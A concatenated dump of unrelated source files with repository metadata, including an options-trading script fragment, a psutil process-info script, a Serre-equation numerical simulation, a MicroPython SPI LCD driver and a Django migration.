assetHash = {'QQQ': 234.35, 'SPY': 337.4, 'DIA': 295.87, 'MDY': 380.93, 'IWM': 168.12, 'OIH': 11.4, 'SMH': 151.0, 'XLE': 55.08, 'XLF': 31.14, 'XLU': 69.2, 'EWJ': 59.443000000000005, 'ES': 3371.75, 'NQ': 9594.25, 'US': 162.0, 'YM': 29445, 'RTY': 1685.7, 'EMD': 2086.4, 'QM': 51.5, 'INDU': 29276.34, 'NDX': 9517.86, 'SPX': 3357.75, 'RUT': 1677.515, 'OEX': 1508.33, 'MID': 2076.67, 'SOX': 1931.08, 'RUI': 1857.118, 'RUA': 1965.181, 'TRAN': 10902.72, 'HGX': 375.83, 'TYX': 20.51, 'XAU': 102.87}
else:
print( 'Getting assetHash...' )
t0 = time.time()
assetHash = {}
for symbol in ETFs:
val, date = utl.getKibotLastValue( symbol,
sType = 'ETF' )
assetHash[ symbol ] = val
for symbol in futures:
val, date = utl.getKibotLastValue( symbol,
sType = 'futures' )
assetHash[ symbol ] = val
for symbol in indices:
val, date = utl.getKibotLastValue( symbol,
sType = 'index' )
assetHash[ symbol ] = val
print( 'Done with getting assetHash! Took %0.2f seconds!' % ( time.time() - t0 ) )
print( assetHash )
# ***********************************************************************
# Get options chain
# ***********************************************************************
options = []
for symbol in ETFs:
print( 'Getting options for %s...' % symbol )
tmpList = utl.getOptionsChain( symbol,
minExprDate = pd.to_datetime( curDate ) + datetime.timedelta( days = 2 ),
maxExprDate = maxDate,
minTradeDate = pd.to_datetime( curDate ) - datetime.timedelta( days = 2 ),
minVolume = 0,
minInterest = 0,
maxTries = 2,
logger = None )
options += tmpList
print( 'Found %d options contracts!' % len( options ) )
# ***********************************************************************
# Process options
# ***********************************************************************
prtObj = MfdOptionsPrt( modFile = modFile,
assetHash = assetHash,
curDate = curDate,
maxDate = maxDate,
maxPriceC = 2000.0,
maxPriceA = 4000.0,
minProb = 0.75,
rfiDaily = 0.0,
tradeFee = 0.0,
nDayTimes = 1140,
logFileName = None,
verbose = 1 )
print( 'Found %d eligible contracts..' % len( prtObj.sortOptions( options ) ) )
actDf = prtObj.getActionDf( cash, options )
print( actDf )
actDf.to_csv( 'actDf.csv', index = False )
|
[
"optilive.developer@gmail.com"
] |
optilive.developer@gmail.com
|
6ead493e481be2b90053998f4cf7e5c19a0a4ee9
|
17660b97a12343c177d766377afbd16787762fa7
|
/23/04/0.py
|
f66495e696b83b82c495f757d7542d6477f67afd
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201706
|
a39caac815f65f226a6b34743f0a0a4eac33ec8e
|
f1cc6af6b18e5bd393cda27f5166067c4645d4d3
|
refs/heads/master
| 2023-01-07T21:25:12.756348
| 2017-06-30T00:35:24
| 2017-06-30T00:35:24
| 93,048,112
| 0
| 1
| null | 2022-12-21T12:10:46
| 2017-06-01T10:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 67
|
py
|
import math
print(math.cos(math.pi / 4))
print(math.log(1024, 2))
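# Added note: expected output is 0.7071067811865476 (= sqrt(2)/2) and 10.0.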
|
[
"pylangstudy@yahoo.co.jp"
] |
pylangstudy@yahoo.co.jp
|
175d9355251e09ef5187142c0464e14e0f2c22c8
|
51d7133f43573c0c04b9dd5020e0d346cf3ae3c3
|
/Assignment 2/Task4.py
|
7f27f492aca33df92fb5be767cf3b2f2f96a2536
|
[] |
no_license
|
bilaltanveer/System-Programming
|
c1c9fa28d2a0f36917b3fdbc00c989053b91f70c
|
b033daa21b791f943abd4a81d9ac77b08eaabe8a
|
refs/heads/master
| 2021-01-24T16:33:48.497287
| 2018-05-20T20:44:39
| 2018-05-20T20:44:39
| 123,203,523
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
import os
import psutil
import time
import datetime
def Info(id):
p=psutil.Process(id)
print("Id: ", id)
print("Name: ", p.name())
print("Status: ", p.status())
print("Parent ID: ", p.ppid() )
print("Parent Name: ", psutil.Process(p.ppid()).name())
print("Memory Info: ", p.memory_info().rss)
print("Process Creation Time: ", datetime.datetime.fromtimestamp(p.create_time()).strftime("%Y-%m-%d %H:%M:%S"))
print("Files Opened by the Process Info: ", p.open_files())
def main():
id=input("Enter the id:")
Info(int(id))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
bilaltanveer.noreply@github.com
|
3fcad67a6b4faa1a140caa80ece18bf5c3ad6f7c
|
227f1ac6ff6c51d76631a05505dc45377ccfb3ff
|
/venv/Scripts/easy_install-3.8-script.py
|
6d9716542d102914b810279f8d549ac895ae6543
|
[] |
no_license
|
roshan-karkera/tree
|
aaaed5de47e4b93226530ef126b7e43f623d8201
|
34e67c98053b7d4da4930bdf7329ca557ac75cd8
|
refs/heads/master
| 2022-12-15T18:56:05.336400
| 2020-09-10T18:20:31
| 2020-09-10T18:20:31
| 294,485,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
#!C:\Users\Admin\PycharmProjects\turtledemo\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
|
[
"roshan.karkera12345@gmail.com"
] |
roshan.karkera12345@gmail.com
|
e23df336881980f9ff533131c3aa7e30adbfa3f0
|
dfc827bf144be6edf735a8b59b000d8216e4bb00
|
/CODE/experimentcode/Thesis/Forced/GrowingGaussianBumpoverPeriodicBed/FEVMTrialsFix/htansformLiftSmooth/Run.py
|
b769f305f98097481de69f0986cb441b46247775
|
[] |
no_license
|
jordanpitt3141/ALL
|
c5f55e2642d4c18b63b4226ddf7c8ca492c8163c
|
3f35c9d8e422e9088fe096a267efda2031ba0123
|
refs/heads/master
| 2020-07-12T16:26:59.684440
| 2019-05-08T04:12:26
| 2019-05-08T04:12:26
| 94,275,573
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,230
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 14:24:26 2017
@author: jp
"""
from Serre2dc import *
from scipy import *
from pylab import plot, show, legend,xlim,ylim,savefig,title,xlabel,ylabel,clf, loglog
import csv
import os
from numpy.linalg import norm,solve
from time import time
def copyarraytoC(a):
n = len(a)
b = mallocPy(n)
for i in range(n):
writetomem(b,i,a[i])
return b
def copyarrayfromC(a,n):
b = [0]*n
for i in range(n):
b[i] = readfrommem(a,i)
return b
def copywritearraytoC(a,b):
n = len(a)
for i in range(n):
writetomem(b,i,a[i])
def makevar(sx,ex,dx,st,et,dt):
x = arange(sx, ex, dx)
t = arange(st, et, dt)
return x,t
def ForcedbedM(x,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx):
n = len(x)
h = zeros(n)
w = zeros(n)
b= zeros(n)
u = zeros(n)
G = zeros(n)
for i in range(n):
phi = x[i] - a2*t
h[i] = a0 + a1*exp(-(phi - a3)**2/(2*a4))*exp(a5*t)
u[i] = a6*exp(-(phi - a3)**2/(2*a4))*exp(a7*t)
b[i] = a8*sin(a9*x[i])
w[i] = h[i] + b[i]
hxi = -a1/a4*(phi - a3)*exp(-(phi - a3)**2/(2*a4))*exp(a5*t)
uxi = -a6/a4*(phi - a3)*exp(-(phi - a3)**2/(2*a4))*exp(a7*t)
uxxi = -a6/(a4**2)*exp(-(phi - a3)**2/(2*a4))*(a4 - ((phi) - a3)**2)*exp(a7*t)
bxi = a8*a9*cos(a9*x[i])
bxxi = -a8*a9**2*sin(a9*x[i])
G[i] = u[i]*h[i]*(1 + hxi*bxi + 0.5*h[i]*bxxi + bxi*bxi) - h[i]*h[i]*hxi*uxi - h[i]*h[i]*h[i]/3.0*uxxi
return h,u,G,b,w
def close(t,ts,dt):
n = len(ts)
var = False
for i in range(n):
if abs(ts[i] - t) < dt:
var = True
return var
#Forcing Problem
wdir = "../../../../data/2018/raw/Thesis/Forced1/Dry/FEVM2/"
if not os.path.exists(wdir):
os.makedirs(wdir)
for ki in range(11,12):
wdirji = wdir + str(ki) + "/"
if not os.path.exists(wdirji):
os.makedirs(wdirji)
a8 = 1
a9 = 2*pi/50.0
width = 2*(2*pi/a9)
a0 = 0.0
a1 = 0.5
a2 = ((2*pi) / a9)/10.0
a3 = -pi/2.0/a9 -width/4.0
a4 = width/2**6
a5 = 0.0
a6 = a1
a7 = 0.0
g = 9.81
startx = -pi/2.0/a9 -width
endx = -pi/2.0/a9 +width
startt = 0.0
endt = (2*pi/a9) / a2
dx = width / (2.0)**(ki)
l = 0.5 / (a6*exp(a7*endt) + sqrt(g*(a0 + a1*exp(a5*endt))))
dt = l*dx
szoomx = startx
ezoomx = endx
t = startt
#x,t = makevar(startx,endx +0.1*dx,dx,startt,endt,dt)
x = arange(startx,endx +0.1*dx, dx)
xG = concatenate((array([x[0] - dx]),x,array([x[-1] + dx])))
xbed = []
for jio in range(len(xG)):
xbed.append(xG[jio] - 0.5*dx)
xbed.append(xG[jio] - dx/6.0)
xbed.append(xG[jio] + dx/6.0)
xbed.append(xG[jio] + 0.5*dx)
ts = []
n = len(x)
theta = 1.0
print(n)
gap = int(1.0/dt)
nBC = 2
GhnBC = 3
unBC = 3
bnBC = 4
nGhhbc = 3*n + 2*(GhnBC)
nubc =2*n -1 + 2*unBC
nbhbc =4*n + 2*(bnBC)
idx = 1.0 / dx
xhuMbeg = array([x[0] - 1.5*dx, x[0] - dx, x[0] -0.5*dx])
xhuMend = array([x[-1] + 0.5*dx, x[-1] + dx, x[-1] + 1.5*dx])
xbMend = array([x[-1] + 0.5*dx, x[-1] + 5*dx/6.0, x[-1] + 7*dx/6.0, x[-1] + 1.5*dx])
xbMbeg = array([x[0] - 1.5*dx, x[0] - 7*dx/6.0,x[0] - 5*dx/6.0 , x[0] -0.5*dx])
h,u,G,b,w = ForcedbedM(x,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
#bM = cos(a5*x)
print(t)
#hMbeg,uMbeg,GMbeg,bta,wMbeg = ForcedbedM(xhuMbeg,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
#hMend ,uMend ,GMend ,bta,wMend = ForcedbedM(xhuMend ,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
niBC = 4
xbegC = arange(startx - niBC*dx,startx,dx)
xendC = arange(endx + dx,endx + (niBC+1)*dx,dx)
hMbeg = a0*ones(GhnBC)
hMend = a0*ones(GhnBC)
wMbeg = hMbeg + a8*sin(a9*xhuMbeg)
wMend = hMend + a8*sin(a9*xhuMend)
uMbeg = zeros(unBC)
uMend = zeros(unBC)
GMbeg = zeros(GhnBC)
GMend = zeros(GhnBC)
bMbeg = a8*sin(a9*xbMbeg)
bMend = a8*sin(a9*xbMend)
b0C = a8*sin(a9*xbegC)
b1C = a8*sin(a9*xendC)
xbcC = concatenate([xbegC,x,xendC])
bbcC = concatenate([b0C,b,b1C])
xbcC_c = copyarraytoC(xbcC)
bbcC_c = copyarraytoC(bbcC)
u0C = u[0]*ones(niBC)
u1C = u[-1]*ones(niBC)
h0C = h[0]*ones(niBC)
h1C = h[-1]*ones(niBC)
G0C = G[0]*ones(niBC)
G1C = G[-1]*ones(niBC)
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
Eni = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pni = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mni = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gni = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
h_c = copyarraytoC(h)
G_c = copyarraytoC(G)
x_c = copyarraytoC(x)
b_c = copyarraytoC(b)
u_c = mallocPy(n)
hMbeg_c = copyarraytoC(hMbeg)
hMend_c = copyarraytoC(hMend)
wMbeg_c = copyarraytoC(wMbeg)
wMend_c = copyarraytoC(wMend)
bMbeg_c = copyarraytoC(bMbeg)
bMend_c = copyarraytoC(bMend)
GMbeg_c = copyarraytoC(GMbeg)
GMend_c = copyarraytoC(GMend)
uMbeg_c = copyarraytoC(uMbeg)
uMend_c = copyarraytoC(uMend)
ubc_c = mallocPy(nubc)
hhbc_c = mallocPy(nGhhbc)
whbc_c = mallocPy(nGhhbc)
Ghbc_c = mallocPy(nGhhbc)
bhbc_c = mallocPy(nbhbc)
wt = [0,endt/4.0,endt/2.0,3*endt/4.0,endt]
t = 0.0
ts.append(t)
#Just an FEM solve here
while t < endt:
if close(t,wt,dt):
hiC = copyarrayfromC(h_c,n)
GiC = copyarrayfromC(G_c,n)
getufromGsplit(h_c, G_c, b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,theta,dx,n,2*n +1,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,ubc_c,hhbc_c,Ghbc_c,whbc_c,bhbc_c)
uibcC = copyarrayfromC(ubc_c,nubc)
uiC = uibcC[unBC:-unBC:2]
wiC = hiC + b
u0C = uiC[0]*ones(niBC)
u1C = uiC[-1]*ones(niBC)
h0C = hiC[0]*ones(niBC)
h1C = hiC[-1]*ones(niBC)
G0C = GiC[0]*ones(niBC)
G1C = GiC[-1]*ones(niBC)
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
En = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pn = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mn = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gn = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
s = wdirji + "outList" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(["cell midpoint" ,'h', 'G' , 'u(m/s)','bed','w' ])
for j in range(n):
writefile2.writerow([str(x[j]), str(hiC[j]) , str(GiC[j]) , str(uiC[j]),str(b[j]),str(wiC[j])])
s = wdirji + "outSing" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(['dx' ,'dt','time',"Energy", "Mass", "Momentum", "G" ,"EnergyI", "MassI", "MomentumI", "GI" ])
writefile2.writerow([str(dx),str(dt),str(t),str(En),str(Mn),str(Pn),str(Gn),str(Eni),str(Mni),str(Pni),str(Gni)])
evolvewrapForcing(G_c,h_c,b_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c ,GMend_c,uMbeg_c,uMend_c,bMbeg_c,bMend_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,g,dx,dt,n,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,theta,hhbc_c, whbc_c,Ghbc_c,bhbc_c,ubc_c,x_c,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9)
t = t + dt
ts.append(t)
print(t)
hiC = copyarrayfromC(h_c,n)
GiC = copyarrayfromC(G_c,n)
getufromGsplit(h_c, G_c, b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,theta,dx,n,2*n +1,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,ubc_c,hhbc_c,Ghbc_c,whbc_c,bhbc_c)
    hibcC = copyarrayfromC(hhbc_c,nubc)
uibcC = copyarrayfromC(ubc_c,nubc)
bibcC = copyarrayfromC(bhbc_c,nbhbc)
uiC = uibcC[unBC:-unBC:2]
wiC = hiC + b
u0C = uiC[0]*ones(niBC)
u1C = uiC[-1]*ones(niBC)
h0C = hiC[0]*ones(niBC)
h1C = hiC[-1]*ones(niBC)
G0C = GiC[0]*ones(niBC)
G1C = GiC[-1]*ones(niBC)
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
En = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pn = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mn = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gn = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
s = wdirji + "outList" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(["cell midpoint" ,'h', 'G' , 'u(m/s)','bed','w' ])
for j in range(n):
writefile2.writerow([str(x[j]), str(hiC[j]) , str(GiC[j]) , str(uiC[j]),str(b[j]),str(wiC[j])])
s = wdirji + "outSing" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(['dx' ,'dt','time',"Energy", "Mass", "Momentum", "G" ,"EnergyI", "MassI", "MomentumI", "GI" ])
writefile2.writerow([str(dx),str(dt),str(t),str(En),str(Mn),str(Pn),str(Gn),str(Eni),str(Mni),str(Pni),str(Gni)])
hA,uA,GA,bA,wA = ForcedbedM(x,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
hnorm = norm(hiC - hA, ord=2)/ norm(hA, ord=2)
unorm = norm(uiC - uA, ord=2)/ norm(uA, ord=2)
Gnorm = norm(GiC - GA, ord=2)/ norm(GA, ord=2)
hC1v = (Mn - Mni)/ Mni
uhC1v = (Pn - Pni)/Pni
GC1v = (Gn - Gni)/Gni
EC1v = (En - Eni)/Eni
s = wdir + "hL1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",hnorm)
file1.write(s)
s = wdir + "GL1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",Gnorm)
file1.write(s)
s = wdir + "uL1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",unorm)
file1.write(s)
s = wdir + "hC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",hC1v)
file1.write(s)
s = wdir + "GC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",uhC1v)
file1.write(s)
s = wdir + "uhC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",GC1v)
file1.write(s)
s = wdir + "HC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",EC1v)
file1.write(s)
deallocPy(h_c)
deallocPy(G_c)
deallocPy(u_c)
deallocPy(ubc_c)
deallocPy(hhbc_c)
deallocPy(whbc_c)
deallocPy(Ghbc_c)
deallocPy(bhbc_c)
deallocPy(hMbeg_c)
deallocPy(GMbeg_c)
deallocPy(uMbeg_c)
deallocPy(hMend_c)
deallocPy(GMend_c)
deallocPy(uMend_c)
deallocPy(wMbeg_c)
deallocPy(wMend_c)
"""
#Soliton Problem
wdir = "../../../../../../data/raw/Forced/P1P2P3BedFEM/GaussBedO/Soltest/"
if not os.path.exists(wdir):
os.makedirs(wdir)
for j in range(20):
g =9.81
a0 = 1.0
a1 = 1.0
width = 50
g = 9.81
dx = width / (2.0)**(j)
l = 0.5 / (sqrt(g*(a0 + a1)))
dt = l*dx
startx = -width/2
endx = width/2 + 0.9*dx
startt = 0.0
endt = 0.1
szoomx = startx
ezoomx = endx
t = 0
#x,t = makevar(startx,endx +0.1*dx,dx,startt,endt,dt)
x = arange(startx,endx +0.1*dx, dx)
xG = concatenate((array([x[0] - dx]),x,array([x[-1] + dx])))
ts = []
n = len(x)
theta = 2
gap = int(1.0/dt)
nBC = 2
GhnBC = 3
unBC = 3
bnBC = 4
nGhhbc = 3*n + 2*(GhnBC)
nubc =2*n -1 + 2*unBC
nbhbc =4*n + 2*(bnBC)
idx = 1.0 / dx
h,u,G,b = solitoninit(n,a0,a1,g,x,startt,0,dx)
w = h + b
print(t)
hMbeg = a0*ones(GhnBC)
hMend = a0*ones(GhnBC)
wMbeg = a0*ones(GhnBC)
wMend = a0*ones(GhnBC)
uMbeg = zeros(GhnBC)
uMend = zeros(GhnBC)
GMbeg = zeros(GhnBC)
GMend = zeros(GhnBC)
bMbeg = zeros(bnBC)
bMend = zeros(bnBC)
h_c = copyarraytoC(h)
G_c = copyarraytoC(G)
x_c = copyarraytoC(x)
b_c = copyarraytoC(b)
u_c = mallocPy(n)
hMbeg_c = copyarraytoC(hMbeg)
hMend_c = copyarraytoC(hMend)
wMbeg_c = copyarraytoC(wMbeg)
wMend_c = copyarraytoC(wMend)
bMbeg_c = copyarraytoC(bMbeg)
bMend_c = copyarraytoC(bMend)
GMbeg_c = copyarraytoC(GMbeg)
GMend_c = copyarraytoC(GMend)
uMbeg_c = copyarraytoC(uMbeg)
uMend_c = copyarraytoC(uMend)
ubc_c = mallocPy(nubc)
hhbc_c = mallocPy(nGhhbc)
whbc_c = mallocPy(nGhhbc)
Ghbc_c = mallocPy(nGhhbc)
bhbc_c = mallocPy(nbhbc)
t = 0.0
ts.append(t)
#Just an FEM solve here
while t < endt:
evolvewrapForcing(G_c,h_c,b_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c ,GMend_c,uMbeg_c,uMend_c,bMbeg_c,bMend_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,g,dx,dt,n,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,theta,hhbc_c, whbc_c,Ghbc_c,bhbc_c,ubc_c,x_c,t)
t = t + dt
ts.append(t)
print(t)
hC = copyarrayfromC(h_c,n)
GC = copyarrayfromC(G_c,n)
getufromG(h_c, G_c, b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,theta,dx,n,2*n +1,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,ubc_c,hhbc_c,Ghbc_c,whbc_c,bhbc_c)
ubcC = copyarrayfromC(ubc_c,nubc)
uC = ubcC[unBC:-unBC:2]
hhbcC = copyarrayfromC(hhbc_c,nGhhbc)
whbcC = copyarrayfromC(whbc_c,nGhhbc)
GhbcC = copyarrayfromC(Ghbc_c,nGhhbc)
bhbcC = copyarrayfromC(bhbc_c,nbhbc)
hA,uA,GA,bA = solitoninit(n,a0,a1,g,x,t,0,dx)
wA = hA + bA
hnorm = norm(hC - hA, ord=2)/ norm(hC, ord=2)
unorm = norm(uC - uA, ord=2)/ norm(uC, ord=2)
Gnorm = norm(GC - GA, ord=2)/ norm(GC, ord=2)
s = wdir + "h.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.15f\n" %(dx," ",hnorm)
file1.write(s)
s = wdir + "G.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.15f\n" %(dx," ",Gnorm)
file1.write(s)
s = wdir + "u.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.15f\n" %(dx," ",unorm)
file1.write(s)
deallocPy(h_c)
deallocPy(G_c)
deallocPy(u_c)
deallocPy(ubc_c)
deallocPy(hhbc_c)
deallocPy(whbc_c)
deallocPy(Ghbc_c)
deallocPy(bhbc_c)
deallocPy(hMbeg_c)
deallocPy(GMbeg_c)
deallocPy(uMbeg_c)
deallocPy(hMend_c)
deallocPy(GMend_c)
deallocPy(uMend_c)
deallocPy(wMbeg_c)
deallocPy(wMend_c)
"""
|
[
"jordanpitt3141@github.com"
] |
jordanpitt3141@github.com
|
76e5aac521950124056aa884c50b6caea915c5bd
|
2084fd977b41983d3e7039e55dccabc3140c123b
|
/scripts/slave/recipe_modules/recipe_autoroller/__init__.py
|
84c53d595824bddb7fd0b098957beca8d6698af4
|
[
"BSD-3-Clause"
] |
permissive
|
eunchong/build
|
14c0404ac3a9821bd88513afbc315ab18dbdd0ab
|
4e95fd33456e552bfaf7d94f7d04b19273d1c534
|
refs/heads/master
| 2021-01-21T14:06:13.614193
| 2016-05-28T05:12:07
| 2016-05-28T05:12:07
| 55,701,415
| 0
| 1
|
NOASSERTION
| 2020-07-23T11:05:04
| 2016-04-07T14:29:36
|
Python
|
UTF-8
|
Python
| false
| false
| 200
|
py
|
DEPS = [
'depot_tools/gclient',
'depot_tools/git',
'luci_config',
'recipe_engine/json',
'recipe_engine/path',
'recipe_engine/python',
'recipe_engine/step',
'recipe_engine/tempfile',
]
|
[
"phajdan.jr@chromium.org"
] |
phajdan.jr@chromium.org
|
9164389c9fadeaddb1a2030af2193a6e17899248
|
4137e27c5ed73c71f77421dfeb3c1949127fe61f
|
/4/lcdesp.py
|
5783ddca1437de1b8403ae599e65d7fcd55fef84
|
[] |
no_license
|
rwmatt/rpi
|
559b34fcdff5437134741b78f9da872e9c8e5419
|
76d3c7b1569bedcd2393d4c3eb52a77df5fa6b73
|
refs/heads/master
| 2020-09-17T08:44:20.963683
| 2019-11-21T17:42:50
| 2019-11-21T17:42:50
| 224,057,901
| 1
| 0
| null | 2019-11-25T23:02:39
| 2019-11-25T23:02:38
| null |
UTF-8
|
Python
| false
| false
| 722
|
py
|
from machine import Pin, SPI
from utime import sleep_ms
rs_pin = Pin(2, Pin.OUT) # Pin D4. Do NOT use the regular MISO pin (D6)
cs_pin = Pin(15, Pin.OUT) # aka SS slave select
cs_pin.on()
#spi = SPI(sck=Pin(14), mosi=Pin(13), miso=Pin(12))
spi = SPI(1)
spi.init(phase = 0)
spi.init(baudrate=400000)
def write_val(csv, c):
global cs_pin, rs_pin, spi
rs_pin.value(csv)
cs_pin.off()
spi.write(bytearray([c]))
#print(nbytes)
cs_pin.on()
sleep_ms(60)
contrast = 0x70 + 0b1000 # from 0x7C
display = 0b1111 # ori 0x0F
init = [0x39, 0x1D, 0x50, 0x6C, contrast , 0x38, display, 0x01, 0x06]
for c in init: write_val(0, c)
for c in ['H', 'E', 'L', 'L', 'O']: write_val(1, ord(c))
spi.deinit()
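# --- Added sketch ---
# The HELLO loop above writes one character at a time with RS=1; it generalizes
# to a small helper (write_str is a name invented here, not part of the original).
# If you try it, call it before spi.deinit() while the bus is still active.
def write_str(s):
    for ch in s:
        write_val(1, ord(ch))  # RS=1 selects the LCD data register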
|
[
"alt.mcarter@gmail.com"
] |
alt.mcarter@gmail.com
|
ab4bfbd4dd1d1a9a1abc2f4fc50268183f7fb8d7
|
797686ff67cea2813efab056d2fb1458660af911
|
/venv/lib/python3.6/_weakrefset.py
|
dcc673e910c5f350456f38e901e424767553cc52
|
[] |
no_license
|
eyedontseeyou/trax
|
ca7dc8d133e197b8c4d87c9d07c1ced3617c2b36
|
3cab050dbe88a928d3888c36a679879923d48342
|
refs/heads/master
| 2021-06-26T16:37:45.464472
| 2017-08-10T18:10:36
| 2017-08-10T18:10:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53
|
py
|
/Users/DASHRC/miniconda3/lib/python3.6/_weakrefset.py
|
[
"diegosanchez@bearfootworks.com"
] |
diegosanchez@bearfootworks.com
|
37ecd7a34b920c36a134674528f77f8a0c050536
|
802c76aab2f6e41b3fb1a591ebe982b32866df07
|
/qianliwang/apps/File/migrations/0007_auto_20200616_2248.py
|
7b89f3c63da8a3dc60c5f2fba8773eab06a723b8
|
[] |
no_license
|
lazyManCoder/slience
|
abf54c05c41eb28aee465dc4684e4f8572b90931
|
036eb3587ddedb0b31a53c604761d31b5e309b8d
|
refs/heads/master
| 2022-11-19T17:24:31.686120
| 2020-07-24T15:21:19
| 2020-07-24T15:21:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# Generated by Django 2.2.1 on 2020-06-16 14:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('File', '0006_note'),
]
operations = [
migrations.AlterField(
model_name='note',
name='data',
field=models.CharField(max_length=6000, null=True),
),
]
|
[
"1490365616@qq.com"
] |
1490365616@qq.com
|
c3dbc544d9d518a59eeba6c6559a1a03ba823516
|
975d42b6d571b071347ecf0c11bc0768cdd1b2a4
|
/tests/tests.py
|
b88bbdc1955c61e18bb4e51ad67b2e6f0a408d35
|
[] |
no_license
|
dizak/covinfo
|
65f8b33ce93571e09cb72e573ced20e17f28ab77
|
ba46302c43e6041c42f6d8e63a121ac9b09a1e69
|
refs/heads/master
| 2021-05-22T15:19:30.813502
| 2020-05-02T13:01:14
| 2020-05-02T13:01:14
| 252,979,129
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,862
|
py
|
